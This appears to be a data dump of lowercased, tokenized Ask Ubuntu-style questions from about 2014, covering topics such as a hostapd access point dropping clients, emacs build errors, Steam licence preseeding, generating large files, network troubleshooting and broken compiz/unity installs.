: sta_remove - > del_station wlan0 00:26:82 : c6:15:72 -- > 0 ( success ) wlan0 : sta 00:26:82 : c6:15:72 mlme : mlme-deauthenticate.indication ( 00:26:82 : c6:15:72 , 2 ) wlan0 : sta 00:26:82 : c6:15:72 mlme : mlme-deletekeys.request ( 00:26:82 : c6:15:72 ) wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=0 addr=0xc73fc0 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=00:26:82 : c6:15:72 nl80211 : drv event 20 ( nl80211_cmd_del_station ) received for wlan0 nl80211 : delete station 28:10:7b:1e:18:08 wlan0 : event eapol_tx_status ( 40 ) received ignore tx status for data frame to sta 28:10:7b:1e:30:96 that is not currently associated nl80211 : drv event 20 ( nl80211_cmd_del_station ) received for wlan0 nl80211 : delete station 00:26:82 : c6:15:72 wlan0 : event eapol_tx_status ( 40 ) received ignore tx status for data frame to sta 28:10:7b:1e:18:08 that is not currently associated nl80211 : drv event 60 ( nl80211_cmd_frame_tx_status ) received for wlan0 nl80211 : frame tx status event wlan0 : event tx_status ( 18 ) received mgmt : :deauth cb sta 28:10:7b:1e:30:96 did not acknowledge deauth removing sta 28:10:7b:1e:30:96 from kernel driver nl80211 : sta_remove - > del_station wlan0 28:10:7b:1e:30:96 -- > -2 ( no such file or directory ) wlan0 : sta 28:10:7b:1e:30:96 mlme : mlme-deauthenticate.indication ( 28:10:7b:1e:30:96 , 2 ) wlan0 : sta 28:10:7b:1e:30:96 mlme : mlme-deletekeys.request ( 28:10:7b:1e:30:96 ) wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=0 addr=0xc747f0 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=28:10:7b:1e:30:96 wlan0 : event eapol_tx_status ( 40 ) received ignore tx status for data frame to sta 00:26:82 : c6:15:72 that is not currently associated nl80211 : drv event 60 ( nl80211_cmd_frame_tx_status ) received for wlan0 nl80211 : frame tx status event wlan0 : event tx_status ( 18 ) received mgmt : :deauth cb sta 28:10:7b:1e:18:08 did not acknowledge deauth removing sta 28:10:7b:1e:18:08 from kernel driver nl80211 : sta_remove - > del_station wlan0 28:10:7b:1e:18:08 -- > -2 ( no such file or directory ) wlan0 : sta 28:10:7b:1e:18:08 mlme : mlme-deauthenticate.indication ( 28:10:7b:1e:18:08 , 2 ) wlan0 : sta 28:10:7b:1e:18:08 mlme : mlme-deletekeys.request ( 28:10:7b:1e:18:08 ) wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=0 addr=0xc745f0 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=28:10:7b:1e:18:08 wlan0 : event eapol_tx_status ( 40 ) received ignore tx status for data frame to sta 28:10:7b:1e:30:96 that is not currently associated nl80211 : drv event 60 ( nl80211_cmd_frame_tx_status ) received for wlan0 nl80211 : frame tx status event wlan0 : event tx_status ( 18 ) received mgmt : :deauth cb sta 00:26:82 : c6:15:72 did not acknowledge deauth removing sta 00:26:82 : c6:15:72 from kernel driver nl80211 : sta_remove - > del_station wlan0 00:26:82 : c6:15:72 -- > -2 ( no such file or directory ) wlan0 : sta 00:26:82 : c6:15:72 mlme : mlme-deauthenticate.indication ( 00:26:82 : c6:15:72 , 2 ) wlan0 : sta 00:26:82 : c6:15:72 mlme : mlme-deletekeys.request ( 00:26:82 : c6:15:72 ) wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=0 addr=0xc73fc0 key_idx=0 set_tx=1 seq_len=0 key_len=0 addr=00:26:82 : c6:15:72 wlan0 : event eapol_tx_status ( 40 ) received ignore tx status for data frame to sta 28:10:7b:1e:18:08 that is not currently associated wlan0 : event eapol_tx_status ( 40 ) received ignore tx status for data frame to sta 00:26:82 : c6:15:72 that is not currently associated wlan0 : event eapol_tx_status ( 40 ) received ignore tx status for data frame to sta 28:10:7b:1e:30:96 that is not currently associated wlan0 : event eapol_tx_status ( 40 ) received ignore tx status for data frame to sta 28:10:7b:1e:18:08 that is not currently associated wlan0 : event eapol_tx_status ( 40 ) received ignore tx status for data frame to sta 00:26:82 : c6:15:72 that is not currently associated wlan0 : event eapol_tx_status ( 40 ) received ignore tx status for data frame to sta 28:10:7b:1e:30:96 that is not currently associated wlan0 : event eapol_tx_status ( 40 ) received ignore tx status for data frame to sta 28:10:7b:1e:18:08 that is not currently associated wlan0 : event eapol_tx_status ( 40 ) received ignore tx status for data frame to sta 00:26:82 : c6:15:72 that is not currently associated ap_handle_timer : 28:10:7b:1e:30:96 flags=0x8a00 timeout_next=3 wlan0 : sta 28:10:7b:1e:30:96 ieee 802.11 : deauthenticated due to local deauth request nl80211 : sta_remove - > del_station wlan0 28:10:7b:1e:30:96 -- > -2 ( no such file or directory ) hostapd_ht_operation_update current operation mode=0x4 hostapd_ht_operation_update new operation mode=0x4 changes=0 ap_free_sta : cancel ap_handle_timer for 28:10:7b:1e:30:96 ap_handle_timer : 28:10:7b:1e:18:08 flags=0x8a00 timeout_next=3 wlan0 : sta 28:10:7b:1e:18:08 ieee 802.11 : deauthenticated due to local deauth request nl80211 : sta_remove - > del_station wlan0 28:10:7b:1e:18:08 -- > -2 ( no such file or directory ) throughout the day it seems like i do have successes with the `` wlan0 : wpa rekeying gtk '' as seen in this log : wlan0 : wpa rekeying gtk wpa : group state machine entering state setkeys ( vlan-id 0 ) gtk - hexdump ( len=32 ) : [ removed ] wpa : 28:10:7b:1e:30:96 wpa_ptk_group entering state rekeynegotiating wlan0 : sta 28:10:7b:1e:30:96 wpa : sending 1/2 msg of group key handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=0 pairwise=0 kde_len=40 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=48 ) : [ removed ] wpa : use eapol-key timeout of 500 ms ( retry counter 1 ) wpa : 28:10:7b:1e:18:08 wpa_ptk_group entering state rekeynegotiating wlan0 : sta 28:10:7b:1e:18:08 wpa : sending 1/2 msg of group key handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=0 pairwise=0 kde_len=40 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=48 ) : [ removed ] wpa : use eapol-key timeout of 500 ms ( retry counter 1 ) wpa : 00:26:82 : c6:15:72 wpa_ptk_group entering state rekeynegotiating wlan0 : sta 00:26:82 : c6:15:72 wpa : sending 1/2 msg of group key handshake wpa : send eapol ( version=2 secure=1 mic=1 ack=1 install=0 pairwise=0 kde_len=40 keyidx=1 encr=1 ) plaintext eapol-key key data - hexdump ( len=48 ) : [ removed ] wpa : use eapol-key timeout of 500 ms ( retry counter 1 ) wpa_group_setkeys : gkeydonestations=3 wlan0 : event eapol_tx_status ( 40 ) received ieee 802.1x : 28:10:7b:1e:30:96 tx status - version=2 type=3 length=143 - ack=1 wpa : eapol-key tx status for sta 28:10:7b:1e:30:96 ack=1 wlan0 : event eapol_rx ( 26 ) received ieee 802.1x : 99 bytes from 28:10:7b:1e:30:96 ieee 802.1x : version=1 type=3 length=95 wpa : received eapol-key from 28:10:7b:1e:30:96 key_info=0x302 type=2 key_data_length=0 wpa : received key nonce - hexdump ( len=32 ) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 wpa : received replay counter - hexdump ( len=8 ) : 00 00 00 00 00 00 00 04 wlan0 : sta 28:10:7b:1e:30:96 wpa : received eapol-key frame ( 2/2 group ) wpa : 28:10:7b:1e:30:96 wpa_ptk_group entering state rekeyestablished wlan0 : sta 28:10:7b:1e:30:96 wpa : group key handshake completed ( rsn ) wpa : 28:10:7b:1e:30:96 wpa_ptk_group entering state idle wlan0 : event eapol_tx_status ( 40 ) received ieee 802.1x : 28:10:7b:1e:18:08 tx status - version=2 type=3 length=143 - ack=1 wpa : eapol-key tx status for sta 28:10:7b:1e:18:08 ack=1 wlan0 : event eapol_tx_status ( 40 ) received ieee 802.1x : 00:26:82 : c6:15:72 tx status - version=2 type=3 length=143 - ack=1 wpa : eapol-key tx status for sta 00:26:82 : c6:15:72 ack=1 wlan0 : event eapol_rx ( 26 ) received ieee 802.1x : 99 bytes from 28:10:7b:1e:18:08 ieee 802.1x : version=1 type=3 length=95 wpa : received eapol-key from 28:10:7b:1e:18:08 key_info=0x302 type=2 key_data_length=0 wpa : received key nonce - hexdump ( len=32 ) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 wpa : received replay counter - hexdump ( len=8 ) : 00 00 00 00 00 00 00 04 wlan0 : sta 28:10:7b:1e:18:08 wpa : received eapol-key frame ( 2/2 group ) wpa : 28:10:7b:1e:18:08 wpa_ptk_group entering state rekeyestablished wlan0 : sta 28:10:7b:1e:18:08 wpa : group key handshake completed ( rsn ) wpa : 28:10:7b:1e:18:08 wpa_ptk_group entering state idle wlan0 : event eapol_rx ( 26 ) received ieee 802.1x : 99 bytes from 00:26:82 : c6:15:72 ieee 802.1x : version=1 type=3 length=95 wpa : received eapol-key from 00:26:82 : c6:15:72 key_info=0x302 type=2 key_data_length=0 wpa : received key nonce - hexdump ( len=32 ) : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 wpa : received replay counter - hexdump ( len=8 ) : 00 00 00 00 00 00 00 04 wlan0 : sta 00:26:82 : c6:15:72 wpa : received eapol-key frame ( 2/2 group ) wpa : 00:26:82 : c6:15:72 wpa_ptk_group entering state rekeyestablished wlan0 : sta 00:26:82 : c6:15:72 wpa : group key handshake completed ( rsn ) wpa : group state machine entering state setkeysdone ( vlan-id 0 ) wpa_driver_nl80211_set_key : ifindex=4 ( wlan0 ) alg=2 addr=0x461492 key_idx=1 set_tx=1 seq_len=0 key_len=32 nl80211 : key_data - hexdump ( len=32 ) : [ removed ] broadcast key wpa : 00:26:82 : c6:15:72 wpa_ptk_group entering state idle here is my hostapd.conf : interface=wlan0 bridge=br1 driver=nl80211 ssid=homewifi channel=4 hw_mode=g ieee80211n=1 wmm_enabled=1 # ht_capab= [ ht40+ ] [ short-gi-40 ] [ dsss_cck-40 ] macaddr_acl=0 auth_algs=1 ignore_broadcast_ssid=0 wpa=2 wpa_passphrase=password wpa_key_mgmt=wpa-psk wpa_pairwise=ccmp tkip rsn_pairwise=ccmp tkip country_code=us logger_syslog=-1 logger_syslog_level=1 logger_stdout=-1 logger_stdout_level=1 i 'm not really sure what the rekeying gtk does , or why no clients seem to respond . it also could just be unrelated in that the ap drops out with no indication and therefore no activity is logged . there really is no other relevant logs that i can find .
506906	compile error : checking for libxaw ... configure : error : no x toolkit could be found	can anyone solve this error ? after i configure emacs and run make , i get the following : [ jroberts @ pc emacs-24.3 ] $ make make : *** no targets specified and no makefile found . stop . here is the output when i run ./configure [ jroberts @ pc emacs-24.3 ] $ ./configure checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /usr/bin/mkdir -p checking for gawk ... gawk checking whether make sets $ ( make ) ... yes checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking for style of include used by make ... gnu checking dependency style of gcc ... gcc3 checking whether gcc and cc understand -c and -o together ... yes checking how to run the c preprocessor ... gcc -e checking for grep that handles long lines and -e ... /usr/bin/grep checking for egrep ... /usr/bin/grep -e checking for minix amsterdam compiler ... no checking for ar ... ar checking for ranlib ... ranlib checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking minix/config.h usability ... no checking minix/config.h presence ... no checking for minix/config.h ... no checking whether it is safe to define __extensions__ ... yes checking for special c compiler options needed for large files ... no checking for _file_offset_bits value needed for large files ... no checking for gcc option to accept iso c99 ... -std=gnu99 checking for gcc -std=gnu99 option to accept iso standard c ... ( cached ) -std=gnu99 checking whether gcc -std=gnu99 accepts -g3 -o2 ... yes checking whether ln -s works ... yes checking for install-info ... /usr/sbin/install-info checking for gzip ... /usr/bin/gzip checking for paxctl ... no checking for makeinfo ... no checking for -znocombreloc ... yes checking for pkg-config ... /usr/bin/pkg-config checking machine/soundcard.h usability ... no checking machine/soundcard.h presence ... no checking for machine/soundcard.h ... no checking sys/soundcard.h usability ... yes checking sys/soundcard.h presence ... yes checking for sys/soundcard.h ... yes checking soundcard.h usability ... no checking soundcard.h presence ... no checking for soundcard.h ... no checking for _oss_ioctl in -lossaudio ... no checking for alsa > = 1.0.0 ... no checking for linux/version.h ... yes checking for sys/systeminfo.h ... no checking for stdio_ext.h ... yes checking for fcntl.h ... yes checking for coff.h ... no checking for pty.h ... yes checking for sys/vlimit.h ... yes checking for sys/resource.h ... yes checking for sys/utsname.h ... yes checking for pwd.h ... yes checking for utmp.h ... yes checking for dirent.h ... yes checking for util.h ... no checking for sys/socket.h ... yes checking for stdlib.h ... ( cached ) yes checking for unistd.h ... ( cached ) yes checking for sys/param.h ... yes checking for pthread.h ... yes checking for malloc/malloc.h ... no checking for maillock.h ... no checking for sys/un.h ... yes checking for execinfo.h ... yes checking for getopt.h ... yes checking for sys/time.h ... yes checking for wchar.h ... yes checking for stdint.h ... ( cached ) yes checking for inttypes.h ... ( cached ) yes checking for sys/select.h ... yes checking for sys/stat.h ... ( cached ) yes checking for utime.h ... yes checking if personality linux32 can be set ... yes checking for term.h ... no checking whether time.h and sys/time.h may both be included ... yes checking whether sys_siglist is declared ... yes checking for sys/wait.h that is posix.1 compatible ... yes checking for speed_t ... yes checking for net/if.h ... yes checking for ifaddrs.h ... yes checking for net/if_dl.h ... no checking for struct ifreq.ifr_flags ... yes checking for struct ifreq.ifr_hwaddr ... yes checking for struct ifreq.ifr_netmask ... yes checking for struct ifreq.ifr_broadaddr ... yes checking for struct ifreq.ifr_addr ... yes checking for struct ifreq.ifr_addr.sa_len ... no checking whether we are using gnu make ... yes checking whether gcc understands -mmd -mf ... yes checking for long file names ... yes checking for x ... libraries , headers checking whether malloc is doug lea style ... yes checking for getpagesize ... yes checking for working mmap ... yes checking for dnet_ntoa in -ldnet ... no checking for main in -lxbsd ... no checking for pthread_self in -lpthread ... yes checking for cma_open in -lpthreads ... no checking whether x on gnu/linux needs -b to link ... no checking for xkb ... yes checking for xrmsetdatabase ... yes checking for xscreenresourcestring ... yes checking for xscreennumberofscreen ... yes checking x11 version 6 ... 6 or newer checking for librsvg-2.0 > = 2.11.0 ... no checking for wand > = 6.2.8 ... no checking for gtk+-3.0 > = 3.0 glib-2.0 > = 2.28 ... no checking for gtk+-2.0 > = 2.10 glib-2.0 > = 2.10 ... no checking for dbus-1 > = 1.0 ... no checking for gio-2.0 > = 2.26 ... no checking for gconf-2.0 > = 2.13 ... no checking for lgetfilecon in -lselinux ... no checking for gnutls > = 2.6.6 ... no checking for gnutls_certificate_set_verify_function ... no checking for xaw3d ... no checking for libxaw ... configure : error : no x toolkit could be found . if you are sure you want emacs compiled without an x toolkit , pass -- with-x-toolkit=no to configure . otherwise , install the development libraries for the toolkit that you want to use ( e.g . gtk+ ) and re-run configure . this does produce a makefile , but it does n't work . any suggestions ?
506909	how can i accept the lience agreement for steam prior to apt-get install ?	i 'm currently fiddling around with using ansible to setup my machine with my chosen configuration/apps etc ... i 've hit a stumbling block with steam and it 's licence agreement . i 've been trying to use debconf to pre-accept it . here 's one of the relevant files in the steam source : http : //bazaar.launchpad.net/~ubuntu-branches/ubuntu/utopic/steam/utopic/view/head : /debian/preinst i 've tried echo steam steam/question select `` i agree '' | sudo debconf-set-selections and a whole bunch of other very similar command also involving trying to set the licence as seen . here 's the output of sudo debconf-show steam : steam/purge : * steam/license : * steam/question : i agree everything i 've tried has led to apt-get thinking i 've pre-disagreed to the licence agreement and i have to remove those entries before i 'm able to install steam . does anyone have any ideas ?
506910	creating a large size file in less time	i want to create a large file ~10g filled with zeros and random values . i have tried using : dd if=/dev/urandom of=10gfile bs=5g count=10 it creates a file of about 2gb and exits with a exit status '0 ' . i fail to understand why ? i also tried creating file using : head -c 10g < /dev/urandom > myfile it takes about 28-30 mins to create it . but i want it created faster . anyone has a solution ? also i wish to create multiple files with same ( pseudo ) random pattern for comparison . does anyone know a way to do that ?
506911	how to remove backup data ubuntu 14.04	i 'm currently using ubuntu 14.04 and i started to do a backup , the program started and stopped when there was n't enough space left to finish the backup . now i do n't have space left to do anything , i would like to know how to delete that backup data so i could have some space on my hard drive .
506913	ca n't ping to a friend 's computer	i have ubuntu 14.04 installed and i recently installed the same version from the same cd on my friend 's computer . when i try to ping him i do n't get any response , when i press ctrl c to terminate ping it says it sent some number of packets , but none of them were received , 100 % packet loss . i thought he might have a firewall installed , but that 's unlikely because i just installed his ubuntu . i read iptables comes with ubuntu , but if so , why can he ping me and i ca n't ping him ? the two computers are not connected to a shared network , i 'd like to ping him just like i can ping www.google.com .
506914	desktop freezes for a few seconds	when i press on settings or sound settings , my whole desktop freezes for like 2 - 3 seconds . i own msi fx600 laptop with intel hd graphics and nvidia 325m graphics and i use x.org xserver drivers any ideas how to fix this ?
506916	how can i get distcc to work ?	i have installed distcc from the ubuntu repositories on several computers all connected to the same wireless network . on each one , i followed a number of the steps outlined in both the `` 60-second instructions '' on the front page and the install file , including starting the daemon with `` distccd -- daemon -- allow 192.168.x.x '' , specifying what hosts could connect in /etc/default/distcc , specifying available hosts in /etc/distcc/hosts , setting the distcc_potential_hosts environment variable , and more ( http : //ubuntuforums.org/showthread.php ? t=1747376 ) . none of the above worked , and much of the information that i have found online is dated , redundant , or just plain does n't work . distcc compiles my code , but refuses to split its workload between any of my computers . would someone please share a solution that allows me to install distcc on several machines and allow me to split up my workload from any machine to all of the others , assuming no prior configuration ?
506918	ubuntu wont pickup my basic phone samsung schr480	when i plug it into my computer with usb cable it doesnât show up but the phone says its plugged in and it says pc mod i tried to c if try them box picked it up and its not in places or on the desktop and no box opens up that asks what to do
506919	failed to mount ubuntu 14.04	i have installed ubuntu 14.04 on a laptop have a windows 7 installed ... works fine for the few first week until i have a problem of `` read only file system `` it was self fixed by restarting and pressing f ... this problem begin to be more ad more frequent till i have the mount failed . it is as following mount : mounting /dev/disk/by-uuid/e49d5efb-d3ed ... .. on /root failed : invailed argument mount : mounting/dev on /root/dev failed no such file or directory mount : mounting/sys on /root/sys failed : no such file or directory mount : mounting/proc on /root/proc failed : no such file or directory target file system does n't have requested /sbin/init . no init found try passing init = bootarg busybox v1.2 ... . # and it begins in ( initramfs ) i do n't know what to do next ' '' but i will surely reinstall it i posted here because i am a beginner and want to learn how to fix it
506921	how to get back unity and compiz after uninstalling , no launcher or dash on startup	i 've gone through a ton of threads regarding this issue with nothing working for me . i removed compiz to reinstall it ( foolishly ) and i just ca n't seem to get unity back . i 'm on 14.04 . the unity plugin is checked in compiz config settings manager . i 've tried uninstalling everything and reinstalling everything . sudo apt-get remove compizconfig-settings-manager sudo apt-get remove compiz-plugins-extra sudo apt-get purge compiz* sudo apt-get install ubuntu-desktop sudo apt-get install compizconfig-settings-manager sudo apt-get install git compiz-plugins-extra sudo apt-get install compiz-plugins-extra sudo apt-get install unity one thing that i think my problem might be is that i ca n't get a connection with dconf . when i try solutions like this : sudo dconf reset -f /org/compiz/ setsid unity or like this sudo apt-get install unity-tweak-tool unity-tweak-tool -- reset-unity i get a huge list of errors like dconf-warning** : failed to commit changes to dconf : could not connect : connection refused dconf-warning** : failed to commit changes to dconf : could not connect : connection refused anyone have other suggestions for how i can fix this ? i 'm desperate not to have to reinstall the operating system altogether . thanks in advance .
506922	dual booting windows8 and ubuntu on 2 separate drives : the allocation slider : what is left what is right	so i just added an old 120gb hdd that i scavenged from my dead xbox360 to my computer , and it works perfectly , i have used it already on windows simply to store files . now i want to use it to dual boot my existing windows8 and ubuntu . when in the installation menu , when it shows me the slider to allocate space , it automatically choses the second hdd ( sdb ) . as far as i know , the slider is used to choose how many space windows ( left ) and ubuntu ( right ) has allocated . but since the second hdd is empty and windows 8 is on the main hdd , why does it ask me how much to allocate ? what is left and what is right ?
506924	suddenly lost my wireless connection	i used to have ubunto 13 installed on my computer , it was the only os in this computer . one day i was at home , connected to my usual wireless connection , watching a show , and suddenly it stopped loading the episode and i lost my connection . from that moment on i am able to connect to other wireless connections , but not my own , my network does n't even appears in the list . everything is fine with my wireless connection , because it continued to work fine in other computers . i did n't change my internet provider or any equipment . this happened several days ago , since then i restarted my computer several times , i unplugged and replugged the router cable , i even installed ubuntu 14.04 on my computer , which i am using now , and nothing worked . ps - i 'm fairly new at linux . if anyone can help me , thank you . miguel pinto
506926	connecting to webdav https with login and password ?	running 14.04 unity hi , i can get nautilus to recognize and 'connect ' to a remote webdav server ( meaning the server shows up ) but i am never prompted to enter my username and password , thus i can not see any of the files . any ideas ?
506927	move unallocated space so it can be assigned to an existing partition	i have an issue that i can not seem to solve , please see the following screenshot : the circles represent the key symbols which are n't removed even during live session from a bootable usb of xubuntu . what i 'm trying to achieve is to move the unallocated space all the way to the bottom so i can merge it with sda7 . i already tried all sorts of techniques of resizing and what not , it simply does n't allow me to move that partition , it wo n't get past sda4 .
506928	what could be blocking port 5060 on my ubuntu 14.04 ?	i have a ubuntu 14.10 , and am trying to telnet into it via port 5060 but i keep failing . i always get the message `` connection closed by foreign host '' . i checked my iptable , it is default policy to accept , and ufw is inactive . so i should be able to telnet into 5060 right ? what else could be blocking it ? root @ server : /var/log # iptables -- list chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination root @ server : /var/log # root @ server : /var/log # ufw status status : inactive root @ server : /var/log # but telneting just gives me this . user @ host ~ $ telnet 192.168.0.5 5060 trying 192.168.0.5 ... connected to 192.168.0.5 . escape character is '^ ] ' . connection closed by foreign host . i want to run sip traffic on that port later but i ca n't even open the port right now . thanks guys
506929	is there a better command to use than sudo ?	i used to hear you are supposed to use gksudo , but that is no longer installed by default . what should be used in its stead ?
506932	fullscreen flash video breaks in ubuntu gnome 14.04.1 in firefox	i 've ran into an issue that completely breaks video in firefox version 31 . on the gaming live stream platform twitch.tv for example , i can full screen the video one time , then close it back to standard size with no problem . the issue arises when i go to full screen the video again . the video will not fullscreen , and the video will freeze , however audio will continue to play . if i un-maximize the firefox window the video feed glitches completely , once again , audio keeps playing . is there any fix for this or is this a bug plaguing firefox . edit : ive tried running chromium and chrome , but maximizing either window breaks the image of the window . edit 2 : ive tested this in unity , kde and xfce the issue seems to be in gnome shell itself
506933	issues with `bandwidthd` when installing `build-essential`	i know the steps for installing vmware workstation 10 in ubuntu , but in second step of apt-get install build-essential i 'm getting error of dpkg and bandwidthd and drive e ... dont know the exact core issue.. i 'm new in ubuntu and wanted to use other os so installing vmware.. i have copied and paste the problem below.. please help me.. root @ stratinsol-desktop : ~ # apt-get install build-essential reading package lists ... done building dependency tree reading state information ... done build-essential is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 515 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? y setting up bandwidthd ( 2.0.1 ) ... update-rc.d : warning : /etc/init.d/bandwidthd missing lsb information update-rc.d : see < http : //wiki.debian.org/lsbinitscripts > /etc/init.d/bandwidthd : 19 : /etc/init.d/bandwidthd : syntax error : `` ( `` unexpected invoke-rc.d : initscript bandwidthd , action `` start '' failed . dpkg : error processing bandwidthd ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already errors were encountered while processing : bandwidthd e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ stratinsol-desktop : ~ #
506934	batch rename using regex but mainaining some substring	i made a lot of research before i put this question . i found a different links to do batch rename using regex like this and other similars : *pattern based , batch file rename in terminal my problem is this , i want to do batch rename using regex but my code does n't work . i have inside a folder different files named like this : name_house_1_door.jpg name_house_2_door.jpg name_house_3_door.jpg name_house_4_door.jpg and i want to rename the files like this : name_house_1.jpg name_house_2.jpg name_house_3.jpg name_house_4.jpg the code that approximate most of that i want was : $ rename -v 's/house\_ [ 0-9 ] \_door/house_ [ 0-9 ] /' but as you should know the first file was renamed as : name_house_ [ 0-9 ] .jpg
506935	i 've completely screwed up my computer by removing compiz then purging dconf* , is there any way to salvage the situation ?	i removed compiz to reinstall it , then i could n't reset it because dconf could n't get a connection and nothing else was working , so in my frustration i decided to purge dconf* and reinstall it all , but by doing that i completely wrecked ubuntu . my desktop is an unresponsive black screen with a mouse , and i 'm trying to somehow get out of this using a tty terminal . nautilus , unity , and pretty much everything else does n't exist anymore , i ca n't use apt-get for anything because i get a whole mess of errors along the lines of : failed to fetch ... .. could not resolve 'archive.ubuntu.com' is there anything i can do to save my documents and maybe restore my operating system to something functional ?
506936	can aptitude add user tags in interactive mode ?	aptitude has a feature to mark packages with arbitrary `` user tags '' . from the command line , one can do this with aptitude add-user-tag . can one access this feature from aptitude 's interactive mode ? i could n't find a relevant menu item or mention in the manual , but i could be overlooking something .
506939	ubuntu 14.04 wallpaper not scaling right after login	whenever i login , my middle and top monitor always have their wallpaper out of scale and it 's quite annoying . i have an amd radeon hd6870 with the latest amd proprietary drivers ( 14.6 ? ) . i always need to switch wallpapers and switch back to make it scale correctly . screenshot any ideas ? thanks .
506941	can not max out hd partition size	i am using ubuntu server ( no gui installed at the moment ) . i am setting it up as a time machine backup . i have navigated all the steps , only to discover that the first ( and only ) partition on my second hard drive , which is 2tb , is showing up as only 356.9gb . i have re-partitioned and re-formatted the drive more than once , and after i delete the old partition ( s ) and add the new one , i select partition # 1 , and then it asks for the first sector , which i have entered as 0 or 1 , and the last sector , which i have entered as the default , highest number in the range available , 748516545 . it always appears ( on both ubuntu and osx ) , as only having 356.9gb . what am i doing wrong here ? how can i make this partition larger than the highest number offered ? any suggestions would be welcome , along with step-by-step guidance , or links , where possible . i 'm brand new to this .
506946	torrent magnet link applications ( ubuntu 14.0 )	how do i set deluge as my default magnet link application i am completely lost . i 've tried going into my mozilla preferences but i cant find deluge when i am searching for the application please help .
506947	wine hearthstone problem	so i 've been wanting to play hearthstone but i have a problem that i ran into . when i try to get into hearthstone all it does is stay on the loading screen with the thing at the top blinking . it then times out and exits me out of the game . i heard this was a time zone issue so i went ahead and changed my time zone to new york as the tutorials suggested . i tried it again but that still did n't work and i got the same results as before . any help would be much appreciated .
506948	i canâ´t install anything now in trusty after upgrade	after upgrading to trusty , it 's been hell because i ca n't install anything from the software center or with terminal . mario @ mario-aspire-5536 : ~ $ sudo apt-get remove linux-generic reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : compiz-gnome : depends : gnome-settings-daemon-schemas ( > = 3.4.2-0ubuntu9 ) but it is not going to be installed unity-settings-daemon : depends : gnome-settings-daemon-schemas ( > = 3.8 ) but it is not going to be installed depends : gnome-settings-daemon-schemas ( < 3.10 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . mario @ mario-aspire-5536 : ~ $ sudo apt-get -f install [ sudo ] password for mario : sorry , try again . [ sudo ] password for mario : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : blender-codecs-ffmpeg2.0 blt libdee-qt5-3 libebml3 libestr0 libjs-prototype libjs-scriptaculous liblcms1 : i386 libllvm3.2 libmatroska5 libmjpegutils-2.1-0 libmng1 : i386 libmozjs-17.0-0 libmplex2-2.1-0 libopenimage io1.2 libopenshadinglanguage1.3 libpthread-stubs0 libtcl8.5 libtk8.5 open jdk-7-jre-lib re2c tcl8.5 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : compiz-core compiz-gnome compiz-plugins-default gnome-settings-daemon-schemas lib compizconfig0 libdecoration0 the following new packages will be installed : gnome-settings-daemon-schemas the following packages will be upgraded : compiz-core compiz-gnome compiz-plugins-default libc ompizconfig0 libdec oration0 5 upgraded , 1 newly installed , 0 to remove and 1258 not upgraded . 87 not fully installed or removed . need to get 1.383 kb/1.428 kb of archives . after this operation , 196 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 ht tp : //hn.archive.ub untu.com/ubuntu/ trusty-updates/main libcompizconfig0 amd64 1:0.9.11.2+14.04.20140714-0ubuntu1 [ 118 kb ] get:2 ht tp : //hn.archive.ubuntu .com/ubuntu/ trusty-updates/main compiz-gnome amd64 1:0.9.11.2+14.04.20140714-0ubuntu1 [ 155 kb ] get:3 ht tp : //hn.archive.ubuntu .com/ubuntu/ trusty-updates/main compiz-plugins-default amd64 1:0.9.11.2+14.04.20140714-0ubuntu1 [ 766 kb ] get:4 htt p : //hn.archive.ubuntu.com/ubuntu/ trusty-updates/main libdecoration0 amd64 1:0.9.11.2+14.04.20140714-0ubuntu1 [ 49,2 kb ] get:5 h ttp : //hn.archive.ubunt u.com/ubuntu/ trusty-updates/main compiz-core amd64 1:0.9.11.2+14.04.20140714-0ubuntu1 [ 296 kb ] fetched 1.383 kb in 7s ( 194 kb/s ) ( reading database ... 305238 files and directories currently installed . ) preparing to unpack ... /libcompizconfig0_1 % 3a0.9.11.2+14.04.20140714-0ubuntu1_amd64.deb ... unpacking libcompizconfig0 ( 1:0.9.11.2+14.04.20140714-0ubuntu1 ) over ( 1:0.9.11.1+14.04.20140701-0ubuntu1 ) ... preparing to unpack ... /compiz-gnome_1 % 3a0.9.11.2+14.04.20140714-0ubuntu1_amd64.deb ... unpacking compiz-gnome ( 